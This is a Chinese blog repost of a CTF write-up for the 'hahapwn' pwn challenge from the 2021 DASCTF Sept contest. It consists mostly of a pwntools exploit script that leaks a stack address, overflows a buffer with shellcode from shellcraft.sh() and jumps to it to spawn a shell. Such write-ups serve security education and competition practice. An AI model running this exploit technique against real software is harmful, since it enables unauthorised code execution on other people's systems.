热门标签
热门文章
- 1Linux之间配置SSH互信(SSH免密码登录)_设置linux互信
- 2爬虫返回乱码以及解决办法以及锟斤拷、ISO-8859-1转码、&#、&#x转码、unicode转码,gbk转码,ascii转码、gb2312转码_爬虫返回中文乱码 编码不管用
- 3PowerPaint:强大扩图编辑工具,兼具上下文感知和文本引导对象修复,ComfyUI体验指南
- 4【Unity学习笔记·第十二】Unity New Input System 及其系统结构和源码浅析_unity input system
- 5【Datawhale AI 夏令营】 NLP自然语言处理 Task3 学习笔记
- 6RGMII 与 GMII 转换电路设计_rgmii接口电路
- 7好用的-开源-免费-Linux远程终端tabby_好用的远程登录终端
- 8如何实现AGI:大模型现状及发展路径(非常详细)零基础入门到精通,收藏这一篇就够了_agi路径
- 9类型混淆漏洞模式浅析
- 10一些观点与金句_在阳光灿烂的日子修缮屋顶 肯尼迪
当前位置: article > 正文
2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn hahapwn
作者:喵喵爱编程 | 2024-07-29 21:42:57
赞
踩
hahapwn
有个strdup要注意一下。
有溢出。
通过strdup泄露栈地址,栈上布置shellcode,跳过去就好啦
exp
from pwn import* context.log_level='debug' context.arch='amd64' context.os = "linux" context.terminal = ["tmux", "splitw", "-h"] local = 1 if local: r = process('./1111111') else: r = remote("node4.buuoj.cn", 25963) #libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6") #libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc.so.6") libc = ELF("./libc.so.6") sa = lambda s,n : r.sendafter(s,n) sla = lambda s,n : r.sendlineafter(s,n) sl = lambda s : r.sendline(s) sd = lambda s : r.send(s) rc = lambda n : r.recv(n) ru = lambda s : r.recvuntil(s) ti = lambda: r.interactive() lg = lambda name,addr :log.success(name+":"+hex(addr)) def debug(): gdb.attach(r) pause() sa("well you input:\n", "a" * 32) stack_addr = u64(ru('\x7f')[-6:] + '\x00\x00') - 0x50 lg("stack_addr", stack_addr) #debug() payload = asm(shellcraft.sh()).ljust(88, '\x00') + p64(stack_addr) sla("EASY PWN PWN PWN~\n", payload) r.interactive()
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/喵喵爱编程/article/detail/900766
推荐阅读
- hellounser[详细] -->
赞
踩
- hellounser[详细] -->
赞
踩
相关标签
